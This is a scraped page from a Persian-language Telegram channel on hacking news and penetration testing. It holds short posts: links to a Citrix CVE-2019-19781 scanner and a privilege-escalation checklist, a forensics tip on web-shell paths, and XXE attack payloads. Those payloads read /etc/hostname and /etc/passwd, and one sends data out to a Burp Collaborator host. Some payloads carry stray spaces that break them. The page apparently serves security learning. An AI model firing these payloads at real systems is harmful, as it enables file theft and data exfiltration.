امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
اینفوگرافی میزان رشد بیگ دیتا

https://www.visualcapitalist.com/big-data-keeps-getting-bigger/

#ML
#AI


@sec_nerd
مرکز فارنزیک دیجیتال و پاسخدهی حوادث عربستان سعودی تایم لاینی منتشر کرد که تطابق آن با برخی از وقایع بین المللی جالب توجه است

گروه های هک ایرانی حسابی از خجالت سعودی ها درآمده اند


https://twitter.com/SaudiDFIR/status/1217455364100280320


#Iran
#ksa
#dfir



@sec_nerd
امنیت اطلاعات
ابزار اسکن برای آسیب پذیری citrix CVE-2019-19781 https://github.com/trustedsec/cve-2019-19781/ #citrix #pentest @sec_nerd
#citrix #shitrix CVE-2019-19781 #DFIR tip:
Check all paths that have aliases in /etc/httpd.conf where web shells can be executed. Outside of /netscaler/ , .php backdoors will work in:

/var/ns_gui/{n_top,shared,support}
/var/vpn/theme/


@sec_nerd
چک لیست بالابردن سطح دسترسی در ویندوز و لینوکس

https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist


#privesc
#windows
#linux


@sec_nerd
برخی روش های استفاده از آسیب پذیری XXE

XXE via File Upload

<!DOCTYPE test [ <!E NTITY xxe SYSTEM "file:/// etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="https://w3.org/2000/svg" ....version="1.1">
<text font-size="40" x="0" y="16"> &xxe;



XXE Attacks via Modified Content Type

POST /hackingman HTTP/1.0
Content-Type: text/html
Content-Length: 7
<?xml version="1.0" encoding="UTF-8"><cicada>3301</cicada>



Exploiting Blind XXE to Exfiltrate Data Out-of-Band

<!ENTI TY % file SYSTEM "f ile:/ //etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfi ltrate SYSTEM 'https://im81nr4zhac2lafxnm997qwk6bc20r.burpcollaborator.net/?x=%file;'>">
%ev al;
%exfiltrate;



Exploiting blind XXE to retrieve data via error messages

<!EN ITY % file SYSTEM "fil e:///etc/pa sswd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///none xistent/%file;'>">
%eval;
%error;




#xxe


@sec_nerd